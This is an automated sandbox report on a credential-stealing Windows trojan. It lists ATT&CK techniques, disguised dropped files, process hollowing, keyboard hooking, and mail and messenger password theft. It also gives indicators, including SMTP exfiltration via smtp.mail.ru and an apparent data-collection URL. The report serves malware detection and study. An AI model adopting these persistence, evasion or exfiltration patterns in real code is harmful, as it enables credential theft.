                    Default AccountsNative API11Registry Run Keys / Startup Folder21Access Token Manipulation1Deobfuscate/Decode Files or Information11Credentials in Registry1File and Directory Discovery3Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationInhibit System Recovery1
                    Domain AccountsShared Modules1Logon Script (Windows)Process Injection512Obfuscated Files or Information41Credentials In Files1System Information Discovery25SMB/Windows Admin SharesInput Capture21Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder21Software Packing13NTDSQuery Registry1Distributed Component Object ModelClipboard Data2Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery241SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion51DCSyncVirtualization/Sandbox Evasion51Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingSystem Network Configuration Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 478309 Sample: aaVb1xEmrd Startdate: 06/09/2021 Architecture: WINDOWS Score: 100 86 Malicious sample detected (through community Yara rule) 2->86 88 Antivirus detection for dropped file 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 15 other signatures 2->92 8 aaVb1xEmrd.exe 12 2->8         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        process3 dnsIp4 60 C:\Users\user\AppData\Local\...\taskhost.exe, PE32 8->60 dropped 62 C:\Users\user\AppData\Local\...\svchost.exe, PE32 8->62 dropped 64 C:\Users\user\AppData\Local\...\iExplorer.exe, PE32 8->64 dropped 66 C:\Users\user\AppData\...\MULTIBOT_NEWW.exe, PE32 8->66 dropped 110 Drops PE files with benign system names 8->110 17 svchost.exe 6 22 8->17         started        22 taskhost.exe 16 7 8->22         started        24 iExplorer.exe 8 8->24         started        26 MULTIBOT_NEWW.exe 8->26         started        112 Installs a global keyboard hook 12->112 84 127.0.0.1 unknown unknown 14->84 file5 signatures6 process7 dnsIp8 68 smtp.mail.ru 94.100.180.160, 49711, 49718, 49719 MAILRU-ASMailRuRU Russian Federation 17->68 70 192.168.2.1 unknown unknown 17->70 52 C:\Users\user\AppData\Roaming\...\WIN32.exe, PE32 17->52 dropped 54 C:\Users\gghfgh\AppData\...\svchost.exe, PE32 17->54 dropped 94 Antivirus detection for dropped file 17->94 96 Creates an undocumented autostart registry key 17->96 98 Machine Learning detection for dropped file 17->98 106 2 other signatures 17->106 28 svchost.exe 17->28         started        72 whatismyipaddress.com 104.16.154.36, 49712, 49715, 80 CLOUDFLARENETUS United States 22->72 74 160.192.10.0.in-addr.arpa 22->74 56 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 22->56 dropped 100 May check the online IP address of the machine 22->100 102 Changes the view of files in windows explorer (hidden files and folders) 22->102 104 Creates multiple autostart registry keys 22->104 108 4 other signatures 22->108 32 dw20.exe 22->32         started        35 vbc.exe 22->35         started        37 vbc.exe 22->37         started        58 C:\Users\user\AppData\...\Windows Update.exe, PE32 24->58 dropped 39 Windows Update.exe 24->39         started        file9 signatures10 process11 dnsIp12 76 smtp.mail.ru 28->76 114 Antivirus detection for dropped file 28->114 116 System process connects to network (likely due to code injection or exploit) 28->116 118 Multi AV Scanner detection for dropped file 28->118 126 2 other signatures 28->126 50 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 32->50 dropped 41 WerFault.exe 35->41         started        43 WerFault.exe 37->43         started        78 whatismyipaddress.com 39->78 80 smtp.mail.ru 39->80 82 160.192.10.0.in-addr.arpa 39->82 120 Writes to foreign memory regions 39->120 122 Allocates memory in foreign processes 39->122 124 Sample uses process hollowing technique 39->124 128 2 other signatures 39->128 45 vbc.exe 39->45         started        48 dw20.exe 39->48         started        file13 signatures14 process15 signatures16 130 Tries to steal Instant Messenger accounts or passwords 45->130 132 Tries to steal Mail credentials (via file access) 45->132

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    aaVb1xEmrd.exe70%VirustotalBrowse
                    aaVb1xEmrd.exe31%MetadefenderBrowse
                    aaVb1xEmrd.exe74%ReversingLabsByteCode-MSIL.Trojan.Generic
                    aaVb1xEmrd.exe100%AviraHEUR/AGEN.1112163
                    aaVb1xEmrd.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraTR/AD.MExecute.lzrac
                    C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraSPR/Tool.MailPassView.473
                    C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\iExplorer.exe100%AviraTR/AD.MExecute.lzrac
                    C:\Users\user\AppData\Local\Temp\iExplorer.exe100%AviraSPR/Tool.MailPassView.473
                    C:\Users\user\AppData\Local\Temp\taskhost.exe100%AviraTR/AD.MExecute.lzrac
                    C:\Users\user\AppData\Local\Temp\taskhost.exe100%AviraSPR/Tool.MailPassView.473
                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraTR/AD.MExecute.lzrac
                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraSPR/Tool.MailPassView.473
                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\iExplorer.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\taskhost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML
                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe100%Joe Sandbox ML
                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe71%MetadefenderBrowse
                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe86%ReversingLabsByteCode-MSIL.Spyware.Generic

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    7.2.iExplorer.exe.6d0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    7.2.iExplorer.exe.6d0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    5.0.taskhost.exe.9c0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.0.taskhost.exe.9c0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    10.0.svchost.exe.bc0000.0.unpack100%AviraTR/Spy.GenDownload File
                    8.0.Windows Update.exe.3d0000.4.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    8.0.Windows Update.exe.3d0000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    8.0.Windows Update.exe.3d0000.10.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    8.0.Windows Update.exe.3d0000.10.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    7.0.iExplorer.exe.6d0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    7.0.iExplorer.exe.6d0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    4.0.svchost.exe.f30000.0.unpack100%AviraTR/Spy.GenDownload File
                    19.0.svchost.exe.320000.0.unpack100%AviraTR/Spy.GenDownload File
                    5.2.taskhost.exe.9c0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    5.2.taskhost.exe.9c0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    8.0.Windows Update.exe.3d0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    8.0.Windows Update.exe.3d0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                    8.2.Windows Update.exe.3d0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                    8.2.Windows Update.exe.3d0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.founder.com.cn/cnO0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comoL0%Avira URL Cloudsafe
                    http://www.fontbureau.comrsh0%Avira URL Cloudsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    https://biz.mail.ru)0%Avira URL Cloudsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/Y0rsh0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnE0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.de0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/phy/0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/Versh0%Avira URL Cloudsafe
                    http://www.carterandcone.com_0%Avira URL Cloudsafe
                    http://www.carterandcone.comlt0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
                    http://www.founder.com.cn/cnz0%Avira URL Cloudsafe
                    http://www.fontbureau.comW0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                    http://www.founder.com.cn/cn/T0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/jp/z0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/P0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/;0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/z0%URL Reputationsafe
                    http://www.founder.com.cn/cn10%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/160%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.comlvfet0%URL Reputationsafe
                    http://www.tiro.comO0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.founder.com.cn/cntL0%Avira URL Cloudsafe
                    http://www.jiyu-kobo.co.jp/c0%URL Reputationsafe
                    http://www.tiro.comic0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/Vet0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.mail.ru
                    		94.100.180.160
                    		truefalse
                      		high
                      whatismyipaddress.com
                      		104.16.154.36
                      		truefalse
                        		high
                        160.192.10.0.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://whatismyipaddress.com/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.founder.com.cn/cnOtaskhost.exe, 00000005.00000003.231488771.0000000005771000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersGiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                              		high
                              http://www.hackforums.net/member.php?action=profile&uid=177092).svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThetaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.hackforums.net/member.php?action=3Dprofile&uid=3D177092).=svchost.exe, 00000004.00000002.266893331.00000000039C4000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comoLtaskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designersiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comrshtaskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.goodfont.co.kriExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://biz.mail.ru)svchost.exe, 00000004.00000002.266303126.00000000039A2000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.carterandcone.comtaskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://tamina212.000webhostapp.com/data.phpWindows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/Y0rshtaskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnEtaskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://whatismyipaddress.com/-taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmpfalse
                                            		high
                                            http://www.hackforums.net/member.phpsvchost.exefalse
                                              		high
                                              http://www.galapagosdesign.com/DPleaseiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/)taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://login.yahoo.com/config/logintaskhost.exe, iExplorer.exe, Windows Update.exefalse
                                                		high
                                                http://www.fonts.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.site.com/logs.phptaskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.urwpp.deDPleasetaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.nirsoft.net/vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmpfalse
                                                      		high
                                                      http://www.urwpp.detaskhost.exe, 00000005.00000003.235558162.0000000005770000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.235337554.0000000005770000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cntaskhost.exe, 00000005.00000003.231928279.0000000005770000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sakkal.comiExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/phy/taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/Vershtaskhost.exe, 00000005.00000003.232528224.000000000574B000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.carterandcone.com_taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.carterandcone.comlttaskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/Gtaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://whatismyipaddress.comtaskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cnziExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fontbureau.comWiExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/jp/taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/TiExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/jp/ztaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/Ptaskhost.exe, 00000005.00000003.231021953.000000000576E000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carterandcone.comltaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/;taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNtaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.jiyu-kobo.co.jp/ztaskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cn1taskhost.exe, 00000005.00000003.231408705.0000000005770000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/16taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cntaskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmltaskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.comlvfetiExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.tiro.comOtaskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.jiyu-kobo.co.jp/taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/accounts/servicelogintaskhost.exe, iExplorer.exe, Windows Update.exefalse
                                                                    		high
                                                                    http://www.founder.com.cn/cntLtaskhost.exe, 00000005.00000003.231545876.0000000005751000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.jiyu-kobo.co.jp/ctaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.tiro.comictaskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.jiyu-kobo.co.jp/Vettaskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.16.154.36
                                                                    		whatismyipaddress.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    94.100.180.160
                                                                    		smtp.mail.ruRussian Federation
                                                                    		47764MAILRU-ASMailRuRUfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.1
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                    Analysis ID:478309
                                                                    Start date:06.09.2021
                                                                    Start time:11:21:17
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 15m 20s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Sample file name:aaVb1xEmrd (renamed file extension from none to exe)
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:40
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.phis.troj.spyw.evad.winEXE@45/38@8/4
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 11.7% (good quality ratio 9.7%)
                                                                    • Quality average: 62.4%
                                                                    • Quality standard deviation: 36.1%
                                                                    HCA Information:
                                                                    • Successful, ratio: 95%
                                                                    • Number of executed functions: 424
                                                                    • Number of non-executed functions: 90
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                                    • Excluded IPs from analysis (whitelisted): 184.30.21.144, 20.42.65.92, 23.211.4.86, 20.189.173.22, 20.50.102.62, 20.189.173.20, 23.55.161.162, 23.55.161.142, 184.24.8.125, 20.199.120.182, 184.24.3.140, 20.82.209.104, 52.182.143.212, 23.216.77.208, 23.216.77.209, 40.112.88.60, 20.82.210.154
